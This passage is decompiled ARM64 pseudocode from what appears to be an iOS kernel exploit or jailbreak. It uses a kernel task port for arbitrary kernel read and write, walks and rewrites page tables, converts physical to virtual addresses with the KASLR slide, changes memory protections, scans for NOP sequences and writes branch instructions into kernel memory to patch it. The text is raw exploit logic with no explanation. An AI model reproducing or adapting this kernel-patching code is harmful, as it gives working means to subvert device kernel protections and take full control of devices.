2463.     *(r31 + 0x1340) = r11;
2464.     r9 = r9 + r10 * 0x8;
2465.     *(r31 + 0x300) = r0;
2466.     r0 = _WriteAnywhere64();
2467.     r12 = zero_extend_64(0x19);
2468.     r8 = *(r31 + 0x1358);
2469.     r9 = *(r31 + 0x1340);
2470.     r10 = r9 + 0x1;
2471.     *(r31 + 0x1340) = r10;
2472.     r8 = r8 + r9 * 0x8;
2473.     *(r31 + 0x2f8) = r0;
2474.     *(r31 + 0x2f0) = r8;
2475.     r0 = _constget();
2476.     r8 = 0x10001e000;
2477.     r8 = r8 + 0x1b8;
2478.     r8 = r8;
2479.     r0 = _WriteAnywhere64();
2480.     r8 = zero_extend_64(0x0);
2481.     r9 = *(r31 + 0x1358);
2482.     r10 = *(r31 + 0x1340);
2483.     r11 = r10 + 0x1;
2484.     *(r31 + 0x1340) = r11;
2485.     r9 = r9 + r10 * 0x8;
2486.     *(r31 + 0x2e8) = r0;
2487.     r0 = _WriteAnywhere64();
2488.     r8 = *(r31 + 0x1358);
2489.     r9 = *(r31 + 0x1340);
2490.     r10 = r9 + 0x1;
2491.     *(r31 + 0x1340) = r10;
2492.     r8 = r8 + r9 * 0x8;
2493.     *(r31 + 0x2e0) = r0;
2494.     r0 = _WriteAnywhere64();
2495.     r8 = zero_extend_64(0x0);
2496.     r9 = *(r31 + 0x1358);
2497.     r10 = *(r31 + 0x1340);
2498.     r11 = r10 + 0x1;
2499.     *(r31 + 0x1340) = r11;
2500.     r9 = r9 + r10 * 0x8;
2501.     *(r31 + 0x2d8) = r0;
2502.     r0 = _WriteAnywhere64();
2503.     r12 = zero_extend_64(0x14);
2504.     r8 = *(r31 + 0x1358);
2505.     r9 = *(r31 + 0x1340);
2506.     r10 = r9 + 0x1;
2507.     *(r31 + 0x1340) = r10;
2508.     r8 = r8 + r9 * 0x8;
2509.     *(r31 + 0x2d0) = r0;
2510.     *(r31 + 0x2c8) = r8;
2511.     r0 = _constget();
2512.     r8 = 0x10001e000;
2513.     r8 = r8 + 0x1b8;
2514.     r9 = r0 + 0x8;
2515.     r8 = r8;
2516.     r0 = _WriteAnywhere64();
2517.     r8 = zero_extend_64(0x0);
2518.     r9 = *(r31 + 0x1358);
2519.     r10 = *(r31 + 0x1340);
2520.     r11 = r10 + 0x1;
2521.     *(r31 + 0x1340) = r11;
2522.     r9 = r9 + r10 * 0x8;
2523.     *(r31 + 0x2c0) = r0;
2524.     r0 = _WriteAnywhere64();
2525.     r12 = zero_extend_64(0x37);
2526.     r8 = *(r31 + 0x1358);
2527.     r9 = *(r31 + 0x1340);
2528.     r10 = r9 + 0x1;
2529.     *(r31 + 0x1340) = r10;
2530.     r8 = r8 + r9 * 0x8;
2531.     *(r31 + 0x2b8) = r0;
2532.     *(r31 + 0x2b0) = r8;
2533.     r0 = _constget();
2534.     r8 = 0x10001e000;
2535.     r8 = r8 + 0x1b8;
2536.     r8 = r8;
2537.     r0 = _WriteAnywhere64();
2538.     r8 = zero_extend_64(0xbc8);
2539.     r9 = *(r31 + 0x1340);
2540.     *(r31 + 0x12f8) = r9;
2541.     r9 = *(r31 + 0x1358);
2542.     r10 = *(r31 + 0x1340);
2543.     r11 = r10 + 0x1;
2544.     *(r31 + 0x1340) = r11;
2545.     r9 = r9 + r10 * 0x8;
2546.     r10 = *(r31 + 0x12f8);
2547.     r8 = r8 - r10 * 0x8;
2548.     *(r31 + 0x2a8) = r0;
2549.     r0 = _WriteAnywhere64();
2550.     r12 = zero_extend_64(0x35);
2551.     r8 = *(r31 + 0x1358);
2552.     r9 = *(r31 + 0x1340);
2553.     r10 = r9 + 0x1;
2554.     *(r31 + 0x1340) = r10;
2555.     r8 = r8 + r9 * 0x8;
2556.     *(r31 + 0x2a0) = r0;
2557.     *(r31 + 0x298) = r8;
2558.     r0 = _constget();
2559.     r8 = 0x10001e000;
2560.     r8 = r8 + 0x1b8;
2561.     r8 = r8;
2562.     r0 = _WriteAnywhere64();
2563.     r8 = zero_extend_64(0x0);
2564.     r9 = *(r31 + 0x1358);
2565.     r10 = *(r31 + 0x1340);
2566.     r11 = r10 + 0x1;
2567.     *(r31 + 0x1340) = r11;
2568.     r9 = r9 + r10 * 0x8;
2569.     *(r31 + 0x290) = r0;
2570.     r0 = _WriteAnywhere64();
2571.     r12 = zero_extend_64(0x36);
2572.     r8 = *(r31 + 0x1358);
2573.     r9 = *(r31 + 0x1340);
2574.     r10 = r9 + 0x1;
2575.     *(r31 + 0x1340) = r10;
2576.     r8 = r8 + r9 * 0x8;
2577.     *(r31 + 0x288) = r0;
2578.     *(r31 + 0x280) = r8;
2579.     r0 = _constget();
2580.     r8 = 0x10001e000;
2581.     r8 = r8 + 0x1b8;
2582.     r8 = r8;
2583.     r0 = _WriteAnywhere64();
2584.     r8 = zero_extend_64(0x0);
2585.     r9 = *(r31 + 0x1358);
2586.     r10 = *(r31 + 0x1340);
2587.     r11 = r10 + 0x1;
2588.     *(r31 + 0x1340) = r11;
2589.     r9 = r9 + r10 * 0x8;
2590.     *(r31 + 0x278) = r0;
2591.     r0 = _WriteAnywhere64();
2592.     r12 = zero_extend_64(0x26);
2593.     r8 = *(r31 + 0x1358);
2594.     r9 = *(r31 + 0x1340);
2595.     r10 = r9 + 0x1;
2596.     *(r31 + 0x1340) = r10;
2597.     r8 = r8 + r9 * 0x8;
2598.     *(r31 + 0x270) = r0;
2599.     *(r31 + 0x268) = r8;
2600.     r0 = _constget();
2601.     r8 = 0x10001e000;
2602.     r8 = r8 + 0x1b8;
2603.     r8 = r8;
2604.     r0 = _WriteAnywhere64();
2605.     asm { movk       x1, #0x40f7 };
2606.     r8 = *(r31 + 0x1358);
2607.     r9 = *(r31 + 0x1340);
2608.     r10 = r9 + 0x1;
2609.     *(r31 + 0x1340) = r10;
2610.     r8 = r8 + r9 * 0x8;
2611.     *(r31 + 0x260) = r0;
2612.     r0 = _WriteAnywhere64();
2613.     r12 = zero_extend_64(0x35);
2614.     r8 = *(r31 + 0x1358);
2615.     r9 = *(r31 + 0x1340);
2616.     r10 = r9 + 0x1;
2617.     *(r31 + 0x1340) = r10;
2618.     r8 = r8 + r9 * 0x8;
2619.     *(r31 + 0x258) = r0;
2620.     *(r31 + 0x250) = r8;
2621.     r0 = _constget();
2622.     r8 = 0x10001e000;
2623.     r8 = r8 + 0x1b8;
2624.     r8 = r8;
2625.     r0 = _WriteAnywhere64();
2626.     r12 = zero_extend_64(0x33);
2627.     r8 = *(r31 + 0x1358);
2628.     r9 = *(r31 + 0x1340);
2629.     r10 = r9 + 0x1;
2630.     *(r31 + 0x1340) = r10;
2631.     r8 = r8 + r9 * 0x8;
2632.     *(r31 + 0x248) = r0;
2633.     *(r31 + 0x240) = r8;
2634.     r0 = _constget();
2635.     r8 = 0x10001e000;
2636.     r8 = r8 + 0x1b8;
2637.     r8 = r8;
2638.     r8 = r0 + r8;
2639.     r0 = _WriteAnywhere64();
2640.     r12 = zero_extend_64(0x21);
2641.     r8 = *(r31 + 0x1358);
2642.     r9 = *(r31 + 0x1340);
2643.     r10 = r9 + 0x1;
2644.     *(r31 + 0x1340) = r10;
2645.     r8 = r8 + r9 * 0x8;
2646.     *(r31 + 0x238) = r0;
2647.     *(r31 + 0x230) = r8;
2648.     r0 = _constget();
2649.     r8 = 0x10001e000;
2650.     r8 = r8 + 0x1b8;
2651.     r8 = r8;
2652.     r0 = _WriteAnywhere64();
2653.     r8 = zero_extend_64(0x0);
2654.     r9 = *(r31 + 0x1358);
2655.     r10 = *(r31 + 0x1340);
2656.     r11 = r10 + 0x1;
2657.     *(r31 + 0x1340) = r11;
2658.     r9 = r9 + r10 * 0x8;
2659.     *(r31 + 0x228) = r0;
2660.     r0 = _WriteAnywhere64();
2661.     r12 = r31 | 0x1c;
2662.     r8 = *(r31 + 0x1358);
2663.     r9 = *(r31 + 0x1340);
2664.     r10 = r9 + 0x1;
2665.     *(r31 + 0x1340) = r10;
2666.     r8 = r8 + r9 * 0x8;
2667.     *(r31 + 0x220) = r0;
2668.     *(r31 + 0x218) = r8;
2669.     r0 = _constget();
2670.     r8 = 0x10001e000;
2671.     r8 = r8 + 0x1b8;
2672.     r8 = r8;
2673.     r0 = _WriteAnywhere64();
2674.     r8 = *(r31 + 0x1358);
2675.     r9 = *(r31 + 0x1340);
2676.     r10 = r9 + 0x1;
2677.     *(r31 + 0x1340) = r10;
2678.     r8 = r8 + r9 * 0x8;
2679.     *(r31 + 0x210) = r0;
2680.     r0 = _WriteAnywhere64();
2681.     r12 = zero_extend_64(0x1d);
2682.     r8 = *(r31 + 0x1358);
2683.     r9 = *(r31 + 0x1340);
2684.     r10 = r9 + 0x1;
2685.     *(r31 + 0x1340) = r10;
2686.     r8 = r8 + r9 * 0x8;
2687.     *(r31 + 0x208) = r0;
2688.     *(r31 + 0x200) = r8;
2689.     r0 = _constget();
2690.     r8 = 0x10001e000;
2691.     r8 = r8 + 0x1b8;
2692.     r8 = r8;
2693.     r0 = _WriteAnywhere64();
2694.     asm { movn       x8, #0xf };
2695.     asm { movk       x8, #0x74a };
2696.     asm { movk       x8, #0xd890 };
2697.     r9 = 0x10001e000;
2698.     r9 = r9 + 0x1b8;
2699.     r10 = *(r31 + 0x1358);
2700.     r10 = r10 + 0xba0;
2701.     r10 = r10 - 0x8;
2702.     r9 = r9;
2703.     *(r31 + 0x1f8) = r0;
2704.     r0 = _WriteAnywhere64();
2705.     asm { movk       x1, #0x4242 };
2706.     r8 = *(r31 + 0x1358);
2707.     r8 = r8 + 0xba0;
2708.     r8 = r8 - 0x10;
2709.     *(r31 + 0x1f0) = r0;
2710.     r0 = _WriteAnywhere64();
2711.     r8 = 0x10001e000;
2712.     asm { movn       x9, #0xf };
2713.     asm { movk       x9, #0x6e3 };
2714.     asm { movk       x9, #0x6ac8 };
2715.     r10 = 0x10001e000;
2716.     r10 = r10 + 0x1b8;
2717.     r10 = r10;
2718.     r9 = r10 + r9;
2719.     *(r31 + 0x1518) = r9;
2720.     r9 = *(r31 + 0x1518);
2721.     r9 = r9 & 0xffffffffffffc000;
2722.     r8 = r9;
2723.     r9 = *(r31 + 0x17b0);
2724.     r8 = r8;
2725.     r8 = r8 >> 0x19;
2726.     r8 = r8 & 0x7ff;
2727.     r12 = r8;
2728.     r12 = r12 << 0x3;
2729.     r8 = r12;
2730.     asm { sxtw       x8, w8 };
2731.     r8 = r9 + r8;
2732.     *(r31 + 0x1e8) = r0;
2733.     r0 = _ReadAnywhere64();
2734.     r8 = r31 | 0x4000;
2735.     *(r31 + 0x12f0) = r0;
2736.     r0 = _physalloc();
2737.     *(r31 + 0x12e8) = r0;
2738.     for (*(r31 + 0x12e4) = r31; *(r31 + 0x12e4) < 0x800; *(r31 + 0x12e4) = *(r31 + 0x12e4) + 0x1) {
2739.             r8 = 0x10001e1d8;
2740.             r9 = 0x10001e1d0;
2741.             r10 = *(r31 + 0x12e8);
2742.             r12 = *(r31 + 0x12e4) << 0x3;
2743.             asm { sxtw       x12, w12 };
2744.             r0 = r10 + r12;
2745.             r8 = ((*(r31 + 0x12f0) & 0xfffffffffffff000) - r9) + r8;
2746.             r9 = *(r31 + 0x12e4) << 0x3;
2747.             asm { sxtw       x9, w9 };
2748.             *(r31 + 0x1e0) = r0;
2749.             *(r31 + 0x1d8) = _ReadAnywhere64();
2750.             *(r31 + 0x1d0) = _WriteAnywhere64();
2751.     }
2752.     r8 = *(r31 + 0x12f0) & 0xfff;
2753.     *(r31 + 0x1c8) = r8;
2754.     *(r31 + 0x12f0) = *(r31 + 0x1c8) | _findphys_real() & 0xfffffffffffff000;
2755.     r0 = *(r31 + 0x17b0);
2756.     r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
2757.     asm { sxtw       x8, w8 };
2758.     *(r31 + 0x1c0) = _WriteAnywhere64();
2759.     *(r31 + 0x1520) = _physalloc();
2760.     r0 = *(r31 + 0x12e8);
2761.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
2762.     asm { sxtw       x8, w8 };
2763.     *(r31 + 0x12d8) = _ReadAnywhere64();
2764.     for (*(r31 + 0x12d4) = r31; *(r31 + 0x12d4) < 0x800; *(r31 + 0x12d4) = *(r31 + 0x12d4) + 0x1) {
2765.             r8 = 0x10001e1d8;
2766.             r9 = 0x10001e1d0;
2767.             r10 = *(r31 + 0x1520);
2768.             r12 = *(r31 + 0x12d4) << 0x3;
2769.             asm { sxtw       x12, w12 };
2770.             r0 = r10 + r12;
2771.             r8 = ((*(r31 + 0x12d8) & 0xfffffffffffff000) - r9) + r8;
2772.             r9 = *(r31 + 0x12d4) << 0x3;
2773.             asm { sxtw       x9, w9 };
2774.             *(r31 + 0x1b8) = r0;
2775.             *(r31 + 0x1b0) = _ReadAnywhere64();
2776.             *(r31 + 0x1a8) = _WriteAnywhere64();
2777.     }
2778.     r8 = *(r31 + 0x12d8) & 0xfff;
2779.     *(r31 + 0x1a0) = r8;
2780.     *(r31 + 0x12d8) = *(r31 + 0x1a0) | _findphys_real() & 0xfffffffffffff000;
2781.     r0 = *(r31 + 0x12e8);
2782.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
2783.     asm { sxtw       x8, w8 };
2784.     r0 = _WriteAnywhere64();
2785.     r8 = *(r31 + 0x1520) + (*(r31 + 0x1518) & 0x3fff);
2786.     r1 = *(r31 + 0x1388) + *(r31 + 0x1398);
2787.     *(r31 + 0x198) = r0;
2788.     r0 = _WriteAnywhere64();
2789.     asm { movn       x1, #0xf };
2790.     asm { movk       x1, #0x6e3 };
2791.     asm { movk       x1, #0x68f8 };
2792.     *(r31 + 0x1518) = 0x10001e1b8 + r1;
2793.     r8 = *(r31 + 0x1518) & 0xffffffffffffc000;
2794.     r1 = *(r31 + 0x17b0);
2795.     r8 = (r8 >> 0x19 & 0x7ff) << 0x3;
2796.     asm { sxtw       x8, w8 };
2797.     *(r31 + 0x190) = r0;
2798.     *(r31 + 0x12c8) = _ReadAnywhere64();
2799.     *(r31 + 0x12c0) = _physalloc();
2800.     for (*(r31 + 0x12bc) = r31; *(r31 + 0x12bc) < 0x800; *(r31 + 0x12bc) = *(r31 + 0x12bc) + 0x1) {
2801.             r8 = 0x10001e1d8;
2802.             r9 = 0x10001e1d0;
2803.             r10 = *(r31 + 0x12c0);
2804.             r12 = *(r31 + 0x12bc) << 0x3;
2805.             asm { sxtw       x12, w12 };
2806.             r0 = r10 + r12;
2807.             r8 = ((*(r31 + 0x12c8) & 0xfffffffffffff000) - r9) + r8;
2808.             r9 = *(r31 + 0x12bc) << 0x3;
2809.             asm { sxtw       x9, w9 };
2810.             *(r31 + 0x188) = r0;
2811.             *(r31 + 0x180) = _ReadAnywhere64();
2812.             *(r31 + 0x178) = _WriteAnywhere64();
2813.     }
2814.     r8 = *(r31 + 0x12c8) & 0xfff;
2815.     *(r31 + 0x170) = r8;
2816.     *(r31 + 0x12c8) = *(r31 + 0x170) | _findphys_real() & 0xfffffffffffff000;
2817.     r0 = *(r31 + 0x17b0);
2818.     r8 = (0x10001e1e8 >> 0x19 & 0x7ff) << 0x3;
2819.     asm { sxtw       x8, w8 };
2820.     *(r31 + 0x168) = _WriteAnywhere64();
2821.     *(r31 + 0x1520) = _physalloc();
2822.     r0 = *(r31 + 0x12c0);
2823.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
2824.     asm { sxtw       x8, w8 };
2825.     *(r31 + 0x12b0) = _ReadAnywhere64();
2826.     for (*(r31 + 0x12ac) = r31; *(r31 + 0x12ac) < 0x800; *(r31 + 0x12ac) = *(r31 + 0x12ac) + 0x1) {
2827.             r8 = 0x10001e1d8;
2828.             r9 = 0x10001e1d0;
2829.             r10 = *(r31 + 0x1520);
2830.             r12 = *(r31 + 0x12ac) << 0x3;
2831.             asm { sxtw       x12, w12 };
2832.             r0 = r10 + r12;
2833.             r8 = ((*(r31 + 0x12b0) & 0xfffffffffffff000) - r9) + r8;
2834.             r9 = *(r31 + 0x12ac) << 0x3;
2835.             asm { sxtw       x9, w9 };
2836.             *(r31 + 0x160) = r0;
2837.             *(r31 + 0x158) = _ReadAnywhere64();
2838.             *(r31 + 0x150) = _WriteAnywhere64();
2839.     }
2840.     r8 = *(r31 + 0x12b0) & 0xfff;
2841.     *(r31 + 0x148) = r8;
2842.     *(r31 + 0x12b0) = *(r31 + 0x148) | _findphys_real() & 0xfffffffffffff000;
2843.     r0 = *(r31 + 0x12c0);
2844.     r8 = (0x10001e1e8 >> 0xe & 0x7ff) << 0x3;
2845.     asm { sxtw       x8, w8 };
2846.     r0 = _WriteAnywhere64();
2847.     asm { movn       x8, #0xf };
2848.     asm { movk       x8, #0x638 };
2849.     asm { movk       x8, #0x6614 };
2850.     r10 = *(r31 + 0x1518) & 0x3fff;
2851.     r10 = *(r31 + 0x1520) + r10;
2852.     *(r31 + 0x140) = r0;
2853.     *(r31 + 0x138) = _WriteAnywhere64();
2854.     goto loc_100016468;
2855.  
2856. loc_1000120f4:
2857.     if (sign_extend_64(0x10001e1c4) != 0x0) goto loc_100012c28;
2858.  
2859. loc_100012104:
2860.     *(r31 + 0x17af) = r31 | 0x1;
2861.     *(r31 + 0xb10) = r31 | 0x4000;
2862.     *(r31 + 0x16b0) = _physalloc();
2863.     r0 = malloc(*(r31 + 0xb10));
2864.     *(r31 + 0x16a8) = r0;
2865.     *(r31 + 0xb08) = r0;
2866.     r0 = _constget();
2867.     ((_ReadAnywhere64() & 0xffffffffffffffff) - *_gPhysBase) + *_gVirtBase;
2868.     _copyin();
2869.     _copyout();
2870.     *(r31 + 0x1688) = zero_extend_64(0x0);
2871.     *(r31 + 0x1690) = r31 + 0x689;
2872.     *(r31 + 0x1698) = r31 | 0x20000000;
2873.     *(r31 + 0x169c) = r31 | 0x20;
2874.     *(r31 + 0x16a0) = zero_extend_64(0x0);
2875.     *(r31 + 0x1680) = 0xc0;
2876.     *(r31 + 0xb00) = malloc(0xc8);
2877.     r8 = 0x1000171d0;
2878.     asm { movn       x3, #0x0 };
2879.     *(r31 + 0x1678) = *(r31 + 0xb00);
2880.     r0 = __memcpy_chk();
2881.     *(r31 + 0x1668) = r31;
2882.     *(r31 + 0xaf8) = r0;
2883.     while (sign_extend_64(*(r31 + 0x1668)) < *(r31 + 0x1680) >> (r31 | 0x3)) {
2884.             r8 = zero_extend_64(0x5151);
2885.             asm { movk       x8, #0x5151 };
2886.             asm { movk       x8, #0x1337 };
2887.             asm { movk       x8, #0x1 };
2888.             if (*(r31 + 0x1678) + sign_extend_64(*(r31 + 0x1668)) * (r31 | 0x8) == r8) {
2889.                     r9 = sign_extend_64(*(r31 + 0x1668));
2890.             }
2891.             r8 = zero_extend_64(0x5151);
2892.             asm { movk       x8, #0x5151 };
2893.             asm { movk       x8, #0x1337 };
2894.             asm { movk       x8, #0x2 };
2895.             if (*(r31 + 0x1678) + sign_extend_64(*(r31 + 0x1668)) * (r31 | 0x8) == r8) {
2896.                     *(r31 + 0xaf0) = _constget();
2897.                     *(r31 + 0xae8) = _ReadAnywhere64();
2898.                     r8 = sign_extend_64(*(r31 + 0x1668));
2899.             }
2900.             r8 = zero_extend_64(0x5151);
2901.             asm { movk       x8, #0x5151 };
2902.             asm { movk       x8, #0x1337 };
2903.             asm { movk       x8, #0x4 };
2904.             if (*(r31 + 0x1678) + sign_extend_64(*(r31 + 0x1668)) * (r31 | 0x8) == r8) {
2905.                     *(r31 + 0xae0) = _constget();
2906.                     r8 = *(r31 + 0xae0) + 0x10001e1b8;
2907.                     r10 = sign_extend_64(*(r31 + 0x1668));
2908.             }
2909.             r8 = zero_extend_64(0x5151);
2910.             asm { movk       x8, #0x5151 };
2911.             asm { movk       x8, #0x1337 };
2912.             asm { movk       x8, #0x6 };
2913.             if (*(r31 + 0x1678) + sign_extend_64(*(r31 + 0x1668)) * (r31 | 0x8) == r8) {
2914.                     *(r31 + 0xad8) = _findphys_real();
2915.                     r8 = sign_extend_64(*(r31 + 0x1668));
2916.             }
2917.             r8 = zero_extend_64(0x5151);
2918.             asm { movk       x8, #0x5151 };
2919.             asm { movk       x8, #0x1337 };
2920.             asm { movk       x8, #0x7 };
2921.             if (*(r31 + 0x1678) + sign_extend_64(*(r31 + 0x1668)) * (r31 | 0x8) == r8) {
2922.                     *(r31 + 0xad0) = _constget();
2923.                     *(r31 + 0xac8) = _ReadAnywhere64();
2924.                     r8 = sign_extend_64(*(r31 + 0x1668));
2925.             }
2926.             *(r31 + 0x1668) = *(r31 + 0x1668) + 0x1;
2927.     }
2928.     *(r31 + 0xac0) = _physalloc();
2929.     *(r31 + 0x1660) = *(r31 + 0xac0);
2930.     _copyout();
2931.     *(r31 + 0xabc) = vm_protect(*_tfp0, *(r31 + 0x1660), r31 | 0x4000, zero_extend_64(0x0), stack[2048]);
2932.     *(r31 + 0xab0) = _constget();
2933.     *(r31 + 0xaa8) = _ReadAnywhere64();
2934.     *(r31 + 0xaa0) = _WriteAnywhere64();
2935.     *(r31 + 0x17b0) = *(r31 + 0x16b0);
2936.     *(r31 + 0xa9c) = vm_protect(*_tfp0, *(r31 + 0x1660), r31 | 0x4000, zero_extend_64(0x0), stack[2048]);
2937.     *(r31 + 0xa90) = _constget();
2938.     *(r31 + 0x1658) = *(r31 + 0xa90) + *_slide;
2939.     *(r31 + 0xa88) = malloc(r31 | 0x4000);
2940.     *(r31 + 0x1650) = *(r31 + 0xa88);
2941.     _copyin();
2942.     *(r31 + 0x1648) = r31;
2943.     *(r31 + 0x1644) = r31;
2944.     goto loc_10001259c;
2945.  
2946. loc_10001259c:
2947.     if (*(r31 + 0x1644) >= 0x1) goto loc_100012698;
2948.  
2949. loc_1000125a8:
2950.     r8 = zero_extend_64(0xd503);
2951.     asm { movk       w8, #0x201f };
2952.     if (*(r31 + 0x1650) + sign_extend_64(*(r31 + 0x1644)) * (r31 | 0x4) != r8) goto loc_100012688;
2953.  
2954. loc_1000125d0:
2955.     r8 = zero_extend_64(0xd503);
2956.     asm { movk       w8, #0x201f };
2957.     r10 = *(r31 + 0x1644) + 0x1;
2958.     asm { sxtw       x10, w10 };
2959.     if (*(r31 + 0x1650) + r10 * (r31 | 0x4) != r8) goto loc_100012688;
2960.  
2961. loc_100012604:
2962.     r8 = zero_extend_64(0xd503);
2963.     asm { movk       w8, #0x201f };
2964.     r10 = *(r31 + 0x1644) + 0x2;
2965.     asm { sxtw       x10, w10 };
2966.     if (*(r31 + 0x1650) + r10 * (r31 | 0x4) != r8) goto loc_100012688;
2967.  
2968. loc_100012638:
2969.     r8 = zero_extend_64(0xd503);
2970.     asm { movk       w8, #0x201f };
2971.     r10 = *(r31 + 0x1644) + 0x3;
2972.     asm { sxtw       x10, w10 };
2973.     if (*(r31 + 0x1650) + r10 * (r31 | 0x4) != r8) goto loc_100012688;
2974.  
2975. loc_10001266c:
2976.     r9 = *(r31 + 0x1644) << 0x2;
2977.     asm { sxtw       x9, w9 };
2978.     *(r31 + 0x1648) = r9;
2979.     goto loc_100012698;
2980.  
2981. loc_100012698:
2982.     *(r31 + 0x1638) = r31;
2983.     for (*(r31 + 0x1634) = r31; *(r31 + 0x1634) < 0x10; *(r31 + 0x1634) = *(r31 + 0x1634) + 0x1) {
2984.             if (*(r31 + 0x1650) + ((*(r31 + 0x1648) >> (r31 | 0x2)) - sign_extend_64(*(r31 + 0x1634))) * (r31 | 0x4) == 0x0) {
2985.                     r8 = *(r31 + 0x1648);
2986.                     r10 = *(r31 + 0x1634) << 0x2;
2987.                     asm { sxtw       x10, w10 };
2988.                     *(r31 + 0x1638) = r8 - r10;
2989.             }
2990.     }
2991.     free(*(r31 + 0x1650));
2992.     *(r31 + 0xa80) = _ReadAnywhere64();
2993.     *(r31 + 0x1628) = (*(r31 + 0xa80) - *_gPhysBase) + *_gVirtBase;
2994.     r8 = *(r31 + 0x1658) & 0xffffffffffffc000;
2995.     *(r31 + 0x1620) = r8;
2996.     *_vad16 = r8;
2997.     r10 = *(r31 + 0x16b0);
2998.     asm { ubfx       x8, x8, #0x19, #0xb };
2999.     *(r31 + 0xa78) = _ReadAnywhere64();
3000.     *(r31 + 0x1618) = *(r31 + 0xa78);
3001.     *(r31 + 0x1610) = ((*(r31 + 0xa78) & 0xfffffffffffff000) - *_gPhysBase) + *_gVirtBase;
3002.     *(r31 + 0x1608) = zero_extend_64(0x0);
3003.     *(r31 + 0xa74) = vm_allocate(*_tfp0, r31 + 0x609, r31 | 0x4000, r31 | 0x1);
3004.     for (*(r31 + 0x1604) = r31; *(r31 + 0x1604) < 0x800; *(r31 + 0x1604) = *(r31 + 0x1604) + 0x1) {
3005.             r8 = *(r31 + 0x1608);
3006.             r0 = *(r31 + 0x1604) << 0x3;
3007.             asm { sxtw       x0, w0 };
3008.             r8 = r8 + r0;
3009.             *(r31 + 0xa68) = r8;
3010.             *(r31 + 0xa60) = _ReadAnywhere64();
3011.             *(r31 + 0xa58) = _WriteAnywhere64();
3012.     }
3013.     *(r31 + 0x15d8) = *__NSConcreteStackBlock;
3014.     *(r31 + 0x15e0) = zero_extend_64(0xc200);
3015.     *(r31 + 0x15e4) = zero_extend_64(0x0);
3016.     *(r31 + 0x15e8) = 0x100016c50;
3017.     *(r31 + 0x15f0) = 0x10001c650;
3018.     *(r31 + 0x15f8) = r31 + 0x689;
3019.     _pagestuff_64();
3020.     *(r31 + 0x1618) = *(r31 + 0x1618) & 0xfff | *(*(r31 + 0x1690) + 0x18) & 0xfffffffffffff000;
3021.     r8 = *(r31 + 0x1620);
3022.     *_vad16 = r8;
3023.     r9 = *(r31 + 0x16b0);
3024.     asm { ubfx       x8, x8, #0x19, #0xb };
3025.     *(r31 + 0xa50) = _WriteAnywhere64();
3026.     r8 = *(r31 + 0x1608);
3027.     r10 = *_vad16;
3028.     asm { ubfx       w10, w10, #0xe, #0xb };
3029.     *(r31 + 0xa48) = _ReadAnywhere64();
3030.     *(r31 + 0x15d0) = *(r31 + 0xa48);
3031.     *(r31 + 0x15c8) = zero_extend_64(0x0);
3032.     *(r31 + 0xa44) = vm_allocate(*_tfp0, r31 + 0x5c9, r31 | 0x4000, r31 | 0x1);
3033.     *(r31 + 0x15c0) = ((*(r31 + 0x15d0) & 0xfffffffffffff000) - 0x10001e1d0) + 0x10001e1d8;
3034.     for (*(r31 + 0x15bc) = r31; *(r31 + 0x15bc) < 0x800; *(r31 + 0x15bc) = *(r31 + 0x15bc) + 0x1) {
3035.             r8 = *(r31 + 0x15c8);
3036.             r0 = *(r31 + 0x15bc) << 0x3;
3037.             asm { sxtw       x0, w0 };
3038.             r8 = r8 + r0;
3039.             *(r31 + 0xa38) = r8;
3040.             *(r31 + 0xa30) = _ReadAnywhere64();
3041.             *(r31 + 0xa28) = _WriteAnywhere64();
3042.     }
3043.     *(r31 + 0x1590) = *__NSConcreteStackBlock;
3044.     *(r31 + 0x1598) = zero_extend_64(0xc200);
3045.     *(r31 + 0x159c) = zero_extend_64(0x0);
3046.     *(r31 + 0x15a0) = 0x100016d18;
3047.     *(r31 + 0x15a8) = 0x10001c680;
3048.     *(r31 + 0x15b0) = r31 + 0x689;
3049.     _pagestuff_64();
3050.     *(r31 + 0x15d0) = *(r31 + 0x15d0) & 0xfff | *(*(r31 + 0x1690) + 0x18) & 0xfffffffffffff000;
3051.     r8 = *(*(r31 + 0x1690) + 0x18) - *_gPhysBase;
3052.     r8 = r8 + *_gVirtBase;
3053.     *(r31 + 0x1588) = r8;
3054.     r0 = r8 + *(r31 + 0x1648);
3055.     r1 = zero_extend_64(0x5800);
3056.     asm { movk       w1, #0x41 };
3057.     *(r31 + 0xa20) = _WriteAnywhere32(r0, r1);
3058.     r0 = 0x4 + *(r31 + 0x1588) + *(r31 + 0x1648);
3059.     r1 = zero_extend_64(0xd61f);
3060.     asm { movk       w1, #0x20 };
3061.     *(r31 + 0xa18) = _WriteAnywhere32(r0, r1);
3062.     *(r31 + 0xa10) = _WriteAnywhere64();
3063.     r0 = *(r31 + 0x1588) + (*(r31 + 0x1658) & 0x3fff);
3064.     r12 = zero_extend_64(0x9400);
3065.     asm { bfxil      w12, w11, #0x2, #0x1a };
3066.     *(r31 + 0xa08) = _WriteAnywhere32(r0, r12);
3067.     *_vad16 = *(r31 + 0x1620);
3068.     r9 = *(r31 + 0x1608);
3069.     r10 = *(r31 + 0x1620);
3070.     asm { ubfx       w10, w10, #0xe, #0xb };
3071.     *(r31 + 0xa00) = _WriteAnywhere64();
3072.     *(r31 + 0x17b8) = *(r31 + 0x1628) + 0x8;
3073.     *(r31 + 0x17c0) = *(r31 + 0x1660) + 0x8;
3074.     *(r31 + 0x17d0) = *(r31 + 0x1628) + 0x8;
3075.     *(r31 + 0x9f8) = _findphys_real();
3076.     *(r31 + 0x9f0) = _constget();
3077.     *(r31 + 0x17c8) = *(r31 + 0x9f8) - (*(r31 + 0x9f0) - *_gVirtBase) + *_slide;
3078.     *(r31 + 0x9e8) = _constget();
3079.     *(r31 + 0x9e0) = _ReadAnywhere64();
3080.     *(r31 + 0x9d8) = _WriteAnywhere64();
3081.     _Block_object_dispose();
3082.     goto loc_100012da4;
3083.  
3084. loc_100012688:
3085.     *(r31 + 0x1644) = *(r31 + 0x1644) + 0x1;
3086.     goto loc_10001259c;
3087.  
3088. loc_100012c28:
3089.     NSLog(@"wtf");
3090.     *(r31 + 0x1580) = malloc(r31 | 0x1000);
3091.     *(r31 + 0x1578) = _physalloc();
3092.     *(r31 + 0x1570) = 0x10001e1c8;
3093.     _copyin();
3094.     _copyout();
3095.     *(r31 + 0x1568) = _ReadAnywhere64();
3096.     *(r31 + 0x1570) = *(r31 + 0x1578);
3097.     *(r31 + 0x1560) = _physalloc();
3098.     _copyin();
3099.     _copyout();
